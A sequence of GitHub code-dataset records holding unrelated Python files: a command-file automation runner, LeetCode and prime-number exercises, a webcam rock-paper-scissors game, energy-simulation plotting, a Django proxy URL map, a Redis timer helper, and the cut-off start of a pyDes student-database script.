(./files/Aliases). \n\tIn order for our aliases to work they must have the following format:\n\t\t.\n\tFor instance:\n\tcd\tFoldersUtils.changeFolder\n\tThis means, everytime a command starts with \"cd\" we will import the module FoldersUtils in folder \"files\" \n\t(if not imported already) and execute the function \"changeFolder\" from that module.\n\tIMPORTANT: Don't use classes, use modules and functions. It won't work otherwise\n\t\"\"\"\n\ttry:\n\t\tprint(\"Loading aliases\")\n\t\tprint(\"Opening file Aliases\")\n\t\t#We load the file Aliases from files which is where we set up which commands we want to replace and using which functions instead\n\t\tvConfig = open(\"./files/Aliases\")\n\t\t#We just go through every line of that file\n\t\tfor line in vConfig:\n\t\t\t#We replace \"\\n\" with nothing so it won't be in the names of our modules/functions\n\t\t\tline = line.replace(\"\\n\",\"\")\n\t\t\t#We split that line using \"\\t\"\n\t\t\tvars = line.split(\"\\t\")\n\t\t\t#We will have two elements at least, the first one, our command wh\n\t\t\taliases[vars[0]] = [vars[1:]]\n\texcept Exception as e:\n\t\tprint(\"Something went wrong when loading our aliases: {0}\".format(e))\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tfname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n\t\tprint(exc_type, fname, exc_tb.tb_lineno)\n\telse:\n\t\t#Files should always be closed, so if our file was opened\n\t\tif(vConfig is not None):\n\t\t\tprint(\"Closing file Aliases\")\n\t\t\t#We close it\n\t\t\tvConfig.close()\n\t\t\tprint(\"Success\")\n\ndef processFile(f,dynamicParameters):\n\t\"\"\"\n\tThis function processes the file where our commands to execute are and executes the commands.\n\t@param f: File where our commands to execute are\n\t@param dynamicParameters: Parameter or list of parameters that our user has given when asked through command line. We will replace each we find\n\tin our lines for this dynamic parameters. If it is just one, we will replace all for that parameter. If not, we will replace them in order.\n\t\"\"\"\n\ttry:\n\t\tprint(\"Process file\")\n\t\t#We define a variable to control if we are inside a new machine/shell or not. By default we won't, so it is False. This is important\n\t\t#as if we connect to other machine, we won't be able to just execute our commands\n\t\tinanewshell = None\n\t\t#We get the number of dynamic parameters used in our file\n\t\tnDynamic = f.read().count(\"\")\n\t\t#If we provided one that one dynamic parameter through the keyboard, it is because we will replace them in order so we need to check that\n\t\t#the number of parameters we provided and the number of dynamic parameters the file expects match\n\t\tif(len(dynamicParameters)>1):\n\t\t\t#If the number of parameters we provided and the number of dynamic parameters the file expects don't match we should raise and exception\n\t\t\t#and finish our execution\n\t\t\tif(len(dynamicParameters) != nDynamic):\n\t\t\t\traise Exception(\"The numbers of dynamic parameters provided and dynamic parameters in the config file don't match\")\n\t\t#We need to rewind our file to the beging now to go line by line\n\t\tf.seek(0,0)\n\t\t#We get a line (a command) from our file in each iteration\n\t\tfor line in f:\n\t\t\t#We clean all \\n of our line\n\t\t\tline = line.replace(\"\\n\",\"\")\n\t\t\t#If we have one or more dynamic parameters to replace\n\t\t\tif(line.count(\"\")>0):\n\t\t\t\t#If we provided more than one dynamic parameter\n\t\t\t\tif(len(dynamicParameters)>1):\n\t\t\t\t\t#For each instance of in that line, we remove the first element in our list of dynamic parameters\n\t\t\t\t\t#and replace the current instance of in the line\n\t\t\t\t\tfor i in range(0,line.count(\"\")):\n\t\t\t\t\t\tdynamicParam = dynamicParameters.pop(0)\n\t\t\t\t\t\t#replace(old_str,new_str,max_count) replaces at most \"max_count\" instaces of old_str for new_str\n\t\t\t\t\t\t#in our case, we told it to replace just one\n\t\t\t\t\t\tline = line.replace(\"\",dynamicParam,1)\n\t\t\t\telse:\n\t\t\t\t\t#If we provided just one dynamic parameter, this means we will use the same parameter for all, so we can just replace it\n\t\t\t\t\tline = line.replace(\"\",dynamicParameters[0])\n\t\n\t\t\tprint(line)\n\t\t\t#Now we check if our line is to be executed using aliases or is to be execute in our shell directly\n\t\t\t#So by default we say our line has no aliases defined\n\t\t\twithalias = False\n\t\t\t#And now we check if our line starts for that one of our aliases\n\t\t\tfor com in aliases:\n\t\t\t\tif(line.startswith(com)):\n\t\t\t\t\t#If it does, we set withalias to True\n\t\t\t\t\twithalias = True\n\t\t\t\t\t#We load the value linked to our alias and we split it using .\n\t\t\t\t\t#That way we get the module and the function to execute\n\t\t\t\t\tmodule,function = aliases[com][0][0].split(\".\")\n\t\t\t\t\t#We import the module\n\t\t\t\t\tnew_module = __import__(module)\n\t\t\t\t\t#We load the function from that module we set up to execute when we get that command in this line\n\t\t\t\t\tfunc = getattr(new_module, function)\n\t\t\t\t\t#Now we execute our command. We have two options:\n\t\t\t\t\t#We are inside a new machine, docker, shell... so we execute the function we defined for that command (in this case, we shall\n\t\t\t\t\t#always use aliases). In this case, we have to provide the object that represents that connection, which we shall return too\n\t\t\t\t\tif(inanewshell is not None):\n\t\t\t\t\t\tinanewshell = func(inanewshell,line)\n\t\t\t\t\telse:\n\t\t\t\t\t\t#Otherwise, if we are not inside a new machine, shell, docker... we just execute the function we defined, but we have to\n\t\t\t\t\t\t#return None if we are not in a new shell or True or an object representing that connection if we just connected to one\n\t\t\t\t\t\tinanewshell = func(line)\n\t\t\t\t\tbreak\n\t\t\t#If our command does not have an alias\n\t\t\tif(withalias == False):\n\t\t\t\t#We just execute it in our shell\n\t\t\t\tprocess = subprocess.Popen(line.split(\" \"), stdout=subprocess.PIPE)\n\t\t\t\toutput, error = process.communicate()\n\t\t\t\tprint(output)\n\n\texcept Exception as e:\n\t\tprint(\"Something went wrong when reading our file: {0}\".format(e))\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tfname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n\t\tprint(exc_type, fname, exc_tb.tb_lineno)\n\ndef main():\n\t\"\"\"\n\tMain function to execute this program.\n\t\"\"\"\n\ttry:\n\t\t#We load our aliases storing them in our global dictionary \"aliases\"\n\t\tloadAliases()\n\t\t#We ask the user to select which command list in folder files he want to load\n\t\tvFile = input(\"Select the file in folder \\\"Files\\\" with the sequence of commands: \")\n\t\t#We open the file selected by the user previously\n\t\tf = open(\"./files/\"+vFile)\n\t\t#We ask the user which list of dynamic parameters he wants to use\n\t\tdynamicParametersCommandLine = input(\"Please, provide here the list of dynamic parameters separated with a blank space (if you provide only one, this will be used in all instances of dynmaic parameters): \")\n\t\t#We generate the list of dynamic parameters (splitting the list provided by the user)\n\t\tdynamicParameters = dynamicParametersCommandLine.split(\" \")\n\t\tprint(dynamicParameters)\n\t\t#We call to method processFile to start executing our commands\n\t\tprocessFile(f,dynamicParameters)\n\texcept Exception as e:\n\t\tprint(\"Something went wrong: {0}\".format(e))\n\t\texc_type, exc_obj, exc_tb = sys.exc_info()\n\t\tfname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]\n\t\tprint(exc_type, fname, exc_tb.tb_lineno)\n\telse:\n\t\t#We always have to close opened files\n\t\tif(f is not None):\n\t\t\tf.close()\n\t\t\tprint(\"Connection to file closed\")\n\t\tprint(\"Goodbye\")\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"AntoData/sequence_cmd_tasks_scripts_automation","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":7523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8778472496","text":"import math\r\n\r\nclass ActorState:\r\n def __init__(self, x=0, y=0, x2=0, y2=0, actor_id=0, target_obj_map={}):\r\n self.x = x\r\n self.y = y\r\n self.x1 = x\r\n self.y1 = y\r\n self.x2 = x2\r\n self.y2 = y2\r\n self.pi = math.pi\r\n self.distance = self.get_distance(x, y, x2, y2)\r\n self.degree = self.get_degree(x, y, x2, y2)\r\n self.id = actor_id\r\n self.obj_map = target_obj_map\r\n self.wait = 15\r\n self.wait_default = 15\r\n\r\n def set_position(self, x, y):\r\n self.x = x\r\n self.y = y\r\n return [self.x, self.y]\r\n\r\n def update_position(self, distance):\r\n xy = self.get_position(distance)\r\n if self.x < self.x2 - distance or self.x > self.x2 + distance:\r\n self.x = xy[0]\r\n elif(self.x == self.x2):\r\n # 目標地点に到達した\r\n if self.wait == 0:\r\n self.x = self.x1\r\n else:\r\n self.x = self.x2\r\n\r\n \r\n \r\n if self.y < self.y2 - distance or self.y > self.y2 + distance:\r\n self.y = xy[1]\r\n elif(self.y == self.y2):\r\n # 目標地点に到達した\r\n if self.wait == 0:\r\n self.y = self.y1\r\n self.wait = self.wait_default\r\n else:\r\n self.wait -= 1\r\n else:\r\n self.y = self.y2\r\n \r\n return [self.x, self.y]\r\n\r\n def get_distance(self, x, y, x2, y2):\r\n #print(\"get_distance input x: %f, y: %f, x2: %f, y2: %f\" % (x, y, x2, y2))\r\n distance = math.sqrt((x2 - x) * (x2 - x) + (y2 - y) * (y2 - y))\r\n return distance\r\n\r\n def get_degree(self, x, y, x2, y2):\r\n #degree = math.degrees(math.atan2(y2 - y, x2 - x))\r\n degree = math.degrees(math.atan2(y - y2, x - x2))\r\n return degree\r\n\r\n def get_position(self, distance):\r\n x = self.x - math.cos(math.radians(self.degree)) * (distance)\r\n y = self.y - math.sin(math.radians(self.degree)) * (distance)\r\n return [x, y]\r\n\r\n def get_obj_map(self):\r\n return self.obj_map\r\n\r\n\r\n\r\n\r\n\r\n def _get_radian(self, x, y, x2, y2):\r\n #print(\"get_distance input x: %f, y: %f, x2: %f, y2: %f\" % (x, y, x2, y2))\r\n radian = math.atan2(y2 - y, x2 - x)\r\n return radian","repo_name":"8vana/8vana","sub_path":"1vana/modules/actor_state.py","file_name":"actor_state.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"32165459109","text":"# Given a binary tree, return the zigzag level order traversal of its nodes' values.\n# (ie, from left to right, then right to left for the next level and alternate between).\n#\n# For example:\n# Given binary tree [3,9,20,null,null,15,7],\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n# return its zigzag level order traversal as:\n# [\n# [3],\n# [20,9],\n# [15,7]\n# ]\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n def zigzagLevelOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n result = []\n cur_queue = []\n if root is not None:\n cur_queue.append(root)\n\n next_direction = 'to_left'\n while cur_queue:\n level = []\n next_queue = []\n while cur_queue:\n cur = cur_queue.pop(0)\n level.append(cur.val)\n\n if next_direction == 'to_left':\n if cur.left is not None:\n next_queue.append(cur.left)\n if cur.right is not None:\n next_queue.append(cur.right)\n else:\n if cur.right is not None:\n next_queue.append(cur.right)\n if cur.left is not None:\n next_queue.append(cur.left)\n\n result.append(level)\n cur_queue = [x for x in reversed(next_queue)]\n if next_direction == 'to_left':\n next_direction = 'to_right'\n else:\n next_direction = 'to_left'\n\n return result\n","repo_name":"BubbleXu/leetcode","sub_path":"103_binary_tree_zigzag_level_order_traversal/binary_tree_zigzag_level_order_traversal.py","file_name":"binary_tree_zigzag_level_order_traversal.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1917654399","text":"import sys\n\nprimes = []\nprime = [True] * 1000001\nfor i in range(2, int(1000000**0.5)+1):\n if prime[i]:\n for j in range(2*i, 1000001, i): # 배수인경우 False\n prime[j] = False\n\nwhile True:\n n = int(sys.stdin.readline().rstrip())\n\n if n == 0:\n break\n\n flag = False\n for i in range(3, n//2+1, 2): # 홀수 이므로 2씩 더해준다.\n if prime[i] and prime[n-i]: # 소수인 경우\n print(f'{n} = {i} + {n-i}')\n flag = True\n break\n\n if not flag:\n print(\"Goldbach's conjecture is wrong.\")","repo_name":"sangyunpark99/Baekjoon_Algorithm","sub_path":"basic(1)/6588.py","file_name":"6588.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31081249140","text":"def extract_player_data(file):\n with open(file) as fle:\n data = fle.readline()\n data = data.strip().split(',')\n return data\n\n\ndef sanitise(time_string):\n if '-' in time_string:\n splitter = '-'\n elif ':' in time_string:\n splitter = ':'\n else:\n return time_string\n (mins, secs) = time_string.split(splitter)\n return mins + '.' + secs\n\n\ndef sanitise_and_sort_list_top_3(list):\n clean_list = [sanitise(x) for x in list]\n sorted_list = sorted(set(clean_list))\n return sorted_list[0:3]\n\nprint(extract_player_data('james.txt'))\nprint(sanitise_and_sort_list(extract_player_data('james.txt')))\n\n","repo_name":"derekreilly1990/PythonProjects","sub_path":"ComprehendingData/comprehending.py","file_name":"comprehending.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37155347236","text":"__author__ = 'Dani'\n\nimport random\n\nNUM_SONGS = 45458287 # 45.458.287\nDESIRED_SONGS = 500000 # 500.000\n\n\ndef read_necessary_index_songs(file_path):\n result = set()\n with open(file_path, \"r\") as file_io:\n for line in file_io:\n line = line.replace(\"\\n\",\"\")\n if line != \"\":\n result.add(int(line))\n return result\n\n\ndef generate_several_indexes_from_a_known_range(preliminar, min_value, max_value, desired):\n result = set().union(preliminar)\n while len(result) < desired:\n result.add(random.randint(min_value, max_value))\n return result\n\n\n\npreliminar_set_of_songs = read_necessary_index_songs(\"files/all_discogs_indexes.txt\")\nwhole_set_of_songs = generate_several_indexes_from_a_known_range(preliminar=preliminar_set_of_songs,\n min_value=0,\n max_value=NUM_SONGS,\n desired=DESIRED_SONGS)\n\nwith open(\"files/500000_discogs_song_indexes.txt\", \"w\") as file_io:\n for an_index in whole_set_of_songs:\n file_io.write(str(an_index) + \"\\n\")\n\n","repo_name":"DaniFdezAlvarez/wMERA","sub_path":"apps/building_graph/main_extract_random_index_songs.py","file_name":"main_extract_random_index_songs.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69902805354","text":"from numpy import *\nfrom HaloFuncs import *\nfrom Params import *\nfrom AtomicFuncs import *\n\n# s orbitals\nn_s = array([1]+[3]+[2]*2)\nZ_s = array([1.4595,5.3244,2.6298,1.7504])\nc_1s = array([1.1347900,-0.001613,-0.100506,-0.270779])\nn = int(input(\"Number of values\"))\n\nE_r_vals = logspace(-1.0,4.0,n)/1000.0 # keV\nq_vals = logspace(-1.0,4.0,n)\n\nnp = 20\n\nF1 = zeros(shape=(n,n))\nfor i in range(0,n):\n F1[i,:] = f_nl_ion_sq(q_vals,E_r_vals[i],0,c_1s,n_s,Z_s,np=np)\n print(i,'of',n)\n\nsavetxt('../data/fion/fion_He.txt',vstack((E_r_vals,q_vals,log10(F1))),delimiter='\\t',fmt=\"%1.16f\")\n","repo_name":"cajohare/DarkElectronRecoils","sub_path":"erec/Tabulate_fion_He.py","file_name":"Tabulate_fion_He.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40917290629","text":"\nimport cv2\nfrom keras.models import load_model\nimport numpy as np\nimport time\nimport random\n\n\n\nclass RPS():\n\n\n def __init__(self):\n self.computer_choice = [\"rock\", \"paper\", \"scissor\"]\n self.max_seconds_choose = 10\n self.computer_wins = 0\n self.user_wins = 0\n self.rounds = 0\n self.labels = [\"scissors\", \"rock\", \"paper\", \"nothing\"]\n\n def get_computer_choice(self):\n \"\"\"Get computer's choice\n :return: string: computers choice\"\"\"\n computer_choice = random.choice(self.computer_choice)\n print(\"Computer choice is :{}\".format(computer_choice))\n return computer_choice\n \n def get_prediction(self, prediction):\n \"\"\"Get predictions from model, highest value in the array\n :prediction: string : list with the numbers for each label\n :return: prediction identified by the model\"\"\"\n max_arg_index = np.argmax(prediction)\n print(\"Your choice iss : {}\".format(self.labels[max_arg_index]))\n return self.labels[max_arg_index]\n\n def get_user_choice(self):\n \"\"\"Get user's choice, gitve the user 6seconds to choose. If didntm choose increase the count\n :return: string: \n \"\"\"\n model = load_model('converted_keras/keras_model.h5')\n cap = cv2.VideoCapture(0)\n data = np.ndarray(shape=(1, 224, 224, 3), dtype=np.float32)\n\n total_duration = 6\n time_passed = 0\n start_time = time.time()\n\n while True: \n ret, frame = cap.read()\n resized_frame = cv2.resize(frame, (224, 224), interpolation = cv2.INTER_AREA)\n image_np = np.array(resized_frame)\n normalized_image = (image_np.astype(np.float32) / 127.0) - 1 # Normalize the image\n data[0] = normalized_image\n prediction = model.predict(data)\n cv2.imshow('frame', frame)\n # Press q to close the window\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n if time.time() - start_time > total_duration:\n print(\"6 seconds have passed, time it over to choose\")\n if self.get_prediction(prediction) != \"Nothing\":\n print(prediction)\n break \n else:\n print(\"You didnt choose yet\")\n continue\n # After the loop release the cap object\n cap.release()\n # Destroy all the windows\n cv2.destroyAllWindows()\n return self.get_prediction(prediction) \n\n def game_flow(self, user_choice, computer_choice):\n \"\"\"Game flow architecture\n :user_choice: string: input from another function\n :computer_choice:string: input from another function\"\"\"\n\n if user_choice == \"rock\" and computer_choice == \"scissor\":\n self.user_wins +=1\n #return self.user_wins\n if user_choice == \"paper\" and computer_choice == \"rock\":\n self.user_wins +=1\n #return self.user_wins\n if user_choice == \"scissor\" and computer_choice == \"paper\":\n self.user_wins +=1\n #return self.user_wins\n elif user_choice != computer_choice:\n self.computer_wins +=1\n #return self.computer_wins\n\n def still_play(self):\n \"\"\"Function to check if the user still want to play\n :return: bool: True or False\"\"\"\n\n _continue_playing = input(\"Do you still want to continue playing? Type yes or no: \")\n if \"yes\" in _continue_playing.lower():\n return True\n else:\n return False\n \n def get_winner(self):\n \"\"\"Decision check who won and print\"\"\"\n user_choice = self.get_user_choice()\n computer_choice = self.get_computer_choice()\n self.game_flow(user_choice, computer_choice)\n if self.user_wins >= 3:\n print(\"Congratualtions, you won! The score was {} for you against {} for the computer\".format(self.user_wins, self.computer_wins))\n return False\n elif self.computer_wins >= 3:\n print(\"You lost the computer won! The score was {} for you against {} for the computer\".format(self.user_wins, self.computer_wins))\n return False\n else:\n return True\n print(\"This is round number {}. Let's continue\".format(self.rounds))\n\n def play(self):\n \"\"\"Function to loop through games if the user wants to keep playing\"\"\"\n _continue=True\n while(_continue):\n self.rounds +=1\n _continue = self.get_winner()\n\n\nif __name__==\"__main__\":\n game = RPS()\n game.play()","repo_name":"alemoraescarv/computer_vision","sub_path":"camera_rps.py","file_name":"camera_rps.py","file_ext":"py","file_size_in_byte":4644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30890095139","text":"import numpy as np\nimport pickle\nfrom pylab import *\n\nimport sys\n\n# Number of simulated days\ndays = 10 \n\n# Logging of values\nkeepEnergyRB = []\nkeepComfortRB = []\nkeepEnergySLSQP = []\nkeepComfortSLSQP = []\nkeepEnergyGA = []\nkeepComfortGA = []\nkeepEnergyGPSS = []\nkeepComfortGPSS = []\n\n# Load results\nbaseResultsFolder = 'Results/Energy/'\nfor ii in range(1, days):\n \n # RB (Baseline) Results\n filename=baseResultsFolder + 'RBworkspace' + str(ii + 1) + '.out'\n with open(filename, 'rb') as f:\n policyRB, EnergyRB, ComfortRB, buildingRB = pickle.load(f)\n keepEnergyRB.append(EnergyRB[-1])\n keepComfortRB.append(ComfortRB[-1])\n \n # SLSQP Results\n filename=baseResultsFolder + 'SLSQPworkspace' + str(ii + 1) + '.out'\n with open(filename, 'rb') as f:\n policySLSQP, EnergySLSQP, ComfortSLSQP, buildingSLSQP = pickle.load(f)\n keepEnergySLSQP.append(EnergySLSQP[-1])\n keepComfortSLSQP.append(ComfortSLSQP[-1])\n \n # NSGA2 Results\n filename=baseResultsFolder + 'NSGA2workspace' + str(ii + 1) + '.out'\n with open(filename, 'rb') as f:\n policyGA, EnergyGA, ComfortGA, buildingGA = pickle.load(f)\n keepEnergyGA.append(EnergyGA[-1])\n keepComfortGA.append(ComfortGA[-1])\n \n # GPSS Results\n filename=baseResultsFolder + 'GPSSworkspace' + str(ii + 1) + '.out'\n with open(filename, 'rb') as f:\n policyGPSS, EnergyGPSS, ComfortGPSS, buildingGPSS = pickle.load(f)\n keepEnergyGPSS.append(EnergyGPSS[-1])\n keepComfortGPSS.append(ComfortGPSS[-1])\n \n\n# Plot and log, Comfort Comparison\nsaveResultsFolder = 'Results/Comparisons/'\nfig = plt.figure()\nax = plt.subplot(111)\nax.plot(keepComfortRB, label='Comfort, RB')\nax.plot(keepComfortSLSQP, label='Comfort, SLSQP')\nax.plot(keepComfortGA, label='Comfort, NSGA2')\nax.plot(keepComfortGPSS, label='Comfort, GP_SS')\nplt.title('Comfort Comparison of RB, SLSQP, GA and GP_SS under Energy Minimization Objective')\nax.legend(loc=\"upper left\", bbox_to_anchor=(1,1))\nplt.show(fig)\nart = []\nart.append(ax.legend)\nfig.savefig(saveResultsFolder + 'AllComfortComparisonEnergy.svg', format = 'svg', dpi = 1200, additional_artists = art, bbox_inches = \"tight\")\npickle.dump(fig, open(saveResultsFolder + 'AllComfortComparisonEnergy.figure', 'wb'))\nplt.close(fig)\n\n# Plot and log, Cost Comparison\nsaveResultsFolder = 'Results/Comparisons/'\nfig = plt.figure()\nax = plt.subplot(111)\nax.plot(keepEnergyRB, label='Consumption, RB')\nax.plot(keepEnergySLSQP, label='Consumption, SLSQP')\nax.plot(keepEnergyGA, label='Consumption, NSGA2')\nax.plot(keepEnergyGPSS, label='Consumption, GP_SS')\nplt.title('Consumption Comparison of RB, SLSQP, GA and GP_SS under Energy Minimization Objective')\nax.legend(loc=\"upper left\", bbox_to_anchor=(1,1))\nplt.show(fig)\nart = []\nart.append(ax.legend)\nfig.savefig(saveResultsFolder + 'AllConsumptionComparisonEnergy.svg', format = 'svg', dpi = 1200, additional_artists = art, bbox_inches = \"tight\")\npickle.dump(fig, open(saveResultsFolder + 'AllConsumptionComparisonEnergy.figure', 'wb'))\nplt.close(fig)\n\n\n\n","repo_name":"MOEEBIUS/SimulationBasedOptimizationOfBuildingControlStrategies","sub_path":"experiments/TestSimpleRoomOpenLoop/CompareEnergyConsumption.py","file_name":"CompareEnergyConsumption.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"36128679151","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n n1,n2=0,0\n while l1:\n n1=n1*10+l1.val\n l1=l1.next\n while l2:\n n2=n2*10+l2.val\n l2=l2.next\n sum=n1+n2\n curr=head=ListNode(0)\n if sum==0: return curr\n while sum:\n head.next=ListNode(sum%10,head.next)\n sum=sum//10\n return curr.next","repo_name":"fikirtederibe/Leetcode","sub_path":"445-add-two-numbers-ii/445-add-two-numbers-ii.py","file_name":"445-add-two-numbers-ii.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6268081201","text":"#상품의 이름 !!#ctrl+스페이스바 활용\nproduct_name = input('상품명을 입력하세요: ')\n#상품의 가격\nprice = int(input('원가를 입력하세요: ')) #int로 형변환을 한거였음(day02기준)\n\n#할인가격\ndiscount = price - price * 0.1\n\n#메세지 출력\nprint(f'{product_name}의 할인가격은 {discount}원입니다.')\n#{}는 변동되는 데이터가 들어갈 때 사용. ' 앞에 f 넣기\nprint(f'{product_name}의 원가는 {price}원이며, 할인가격은 {discount}원입니다.')\n","repo_name":"KRDJK/python_and_memo","sub_path":"day01/input_prac1.py","file_name":"input_prac1.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24604385410","text":"from django.urls import path\nfrom .views import create_site, view_sites, update_site, proxy_view, site_detail, site_statistics\n\napp_name = 'proxy'\n\nurlpatterns = [\n path('create_site/', create_site, name='create_site'),\n path('view_sites/', view_sites, name='view_sites'),\n path('edit_site//', update_site, name='edit_site'),\n path('site_detail//', site_detail, name='site_detail'),\n path('site_statistics/', site_statistics, name='site_statistics'),\n path('//', proxy_view, name='proxy_view')\n]","repo_name":"VladRogozin/vpn","sub_path":"vpn/proxy/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23030593016","text":"# -*- coding: utf-8 -*-\r\n\r\nimport time\r\nimport threading\r\nimport uuid\r\nimport json\r\nimport traceback\r\nimport redis\r\n\r\nimport conf\r\n\r\n\r\nclass RedisHelper(object):\r\n \"\"\"\r\n Implementation of timers, messages\r\n \"\"\"\r\n EXPIRED_CHANNELS = ['__keyevent@%d__:expired' % num for num in range(16)]\r\n TIMER_EVENT_KEY = \"timer_event\"\r\n\r\n def __init__(self):\r\n self.host = conf.HOST\r\n self.port = conf.PORT\r\n self.password = conf.PASSWORD\r\n\r\n self.conn = self.get_conn()\r\n # 定义订阅频道名称\r\n self.channel = 'cross_server' \r\n\r\n def publish(self, msg, channel=\"\", json_str=False):\r\n \"\"\"Publish channel messaging\r\n\r\n :param msg: message content or message id\r\n :param channel: channel name\r\n :param json_str: msg'format\r\n :return: bool\r\n \"\"\"\r\n if not json_str:\r\n msg = json.dumps({\"__id__\": msg})\r\n \r\n num = self.conn.publish(channel or self.channel, msg)\r\n return bool(num)\r\n\r\n def subscribe(self, channels=[]): # 定义订阅方法\r\n \"\"\"Subscribe channel\r\n\r\n :param channels: channel name list\r\n :return:\r\n \"\"\"\r\n pub = self.conn.pubsub()\r\n if not channels:\r\n channels = [self.channel]\r\n \r\n pub.subscribe(*channels)\r\n pub.parse_response()\r\n return pub\r\n\r\n def get_conn(self):\r\n if self.password:\r\n conn = redis.Redis(host=self.host, port=self.port, password=self.password)\r\n else:\r\n conn = redis.Redis(host=self.host, port=self.port)\r\n\r\n return conn\r\n\r\n def save_msg(self, msg_info, expire_time=None, prefix=\"\"):\r\n \"\"\"Store message data into redis\r\n\r\n :param msg_info: content can be serialized by JSON\r\n :param expire_time: unit is seconds\r\n :param prefix: message ID prefix is easy to categorize\r\n\r\n :return:\r\n \"\"\"\r\n msg_id = uuid.uuid4().hex\r\n if prefix:\r\n msg_id = \"%s_%s\" % (prefix, msg_id)\r\n if expire_time:\r\n self.conn.setex(msg_id, json.dumps(msg_info), expire_time)\r\n else:\r\n self.conn.set(msg_id, json.dumps(msg_info))\r\n return msg_id\r\n\r\n def create_timer_event(self, msg_info, expire_time=0, expire_sec=0, prefix=\"\"):\r\n \"\"\"Create timer based on key expiration time\r\n\r\n :param msg_info: content can be serialized by JSON, type is dict\r\n :param expire_time: unix timestamp\r\n :param expire_sec: unit is seconds\r\n :param prefix: message ID prefix is easy to categorize\r\n :return:\r\n \"\"\"\r\n msg_id = uuid.uuid4().hex\r\n now = int(time.time())\r\n if prefix:\r\n msg_id = \"%s_%s\" % (prefix, msg_id)\r\n\r\n # 计算失效秒数\r\n if expire_time and expire_time > now:\r\n expire_sec = expire_time - now\r\n msg_info['expire_time'] = expire_time\r\n else:\r\n if expire_sec <= 0:\r\n expire_sec = 1\r\n msg_info['expire_time'] = now + expire_sec\r\n\r\n # unique: 全局定时器惟一标识\r\n # callback: redis键失效时触发该方法\r\n # accepters: 哪些可以接收该定时器的调用\r\n unique = msg_info.get(\"unique\", False)\r\n callback_func = msg_info['kwargs'][\"callback\"]\r\n accepters = msg_info.get(\"accepters\", [])\r\n msg_info['msg_id'] = msg_id\r\n msg_info['create_time'] = now\r\n\r\n # save timer keys\r\n msg_info = json.dumps(msg_info)\r\n pipeline = self.conn.pipeline()\r\n pipeline.hset(RedisHelper.TIMER_EVENT_KEY, msg_id, msg_info)\r\n pipeline.setex(msg_id, msg_info, int(expire_sec))\r\n\r\n # 全局定时器覆盖旧的数据\r\n if unique:\r\n for accepter in accepters:\r\n pipeline.set(\"%s:%s:%s\" % (RedisHelper.TIMER_EVENT_KEY, callback_func, accepter), msg_id)\r\n if not accepters:\r\n pipeline.set(\"%s:%s\" % (RedisHelper.TIMER_EVENT_KEY, callback_func), msg_id)\r\n pipeline.execute()\r\n\r\n return msg_id\r\n\r\n def cancel_timer_event(self, timer_id):\r\n \"\"\"Cancel timer by timer id\r\n\r\n \"\"\"\r\n pipeline = self.conn.pipeline()\r\n pipeline.hdel(RedisHelper.TIMER_EVENT_KEY, timer_id)\r\n pipeline.delete(timer_id)\r\n pipeline.execute()\r\n\r\n def keep_alive(self):\r\n \"\"\"Keep client long connection\r\n\r\n \"\"\"\r\n _thread = threading.Thread(target=self._ping)\r\n _thread.start()\r\n\r\n def _ping(self, seconds=60):\r\n \"\"\"Ping redis server per minute\r\n\r\n \"\"\"\r\n while True:\r\n time.sleep(seconds)\r\n if not self.conn.ping():\r\n print(\"conn get lost. call him back now!\")\r\n self.conn = self.get_conn()\r\n\r\n\r\nredis_helper = RedisHelper()\r\n\r\n\r\n","repo_name":"totide/redis-publishlib","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":4889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"1936672695","text":"from pydes2 import *\r\nimport sqlite3\r\n\r\nk = des(\"SECURITY\", \"CBC\", \"\\0\\0\\0\\0\\0\\0\\0\\0\",pad=None, padmode = PAD_PKCS5)\r\nconn = sqlite3.connect('studentdatabase.db')\r\nc = conn.cursor()\r\n\r\nclass Course:\r\n def 